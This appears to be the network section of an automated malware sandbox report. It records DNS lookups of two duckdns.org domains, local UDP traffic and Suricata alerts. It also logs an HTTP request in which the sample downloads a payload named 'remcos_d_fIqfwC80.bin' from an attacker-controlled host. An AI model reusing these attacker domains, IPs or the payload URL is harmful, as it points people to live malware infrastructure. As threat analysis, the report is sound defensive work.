Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| d-wave.duckdns.org | 156.96.119.123 | |
| d-bins.duckdns.org | 23.146.242.94 |
- UDP Requests
-
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://d-bins.duckdns.org/remcos_d_fIqfwC80.bin
REQUEST
RESPONSE
BODY
GET /remcos_d_fIqfwC80.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: d-bins.duckdns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Sun, 22 Aug 2021 22:52:27 GMT
Accept-Ranges: bytes
ETag: "c4744661a897d71:0"
Server: Microsoft-IIS/8.5
Date: Tue, 24 Aug 2021 08:15:58 GMT
Content-Length: 469056
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 156.96.119.123:1144 -> 192.168.56.101:49206 | 2400015 | ET DROP Spamhaus DROP Listed Traffic Inbound group 16 | Misc Attack |
| UDP 192.168.56.101:59369 -> 164.124.101.2:53 | 2022918 | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain | Misc activity |
| UDP 192.168.56.101:61479 -> 164.124.101.2:53 | 2022918 | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain | Misc activity |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts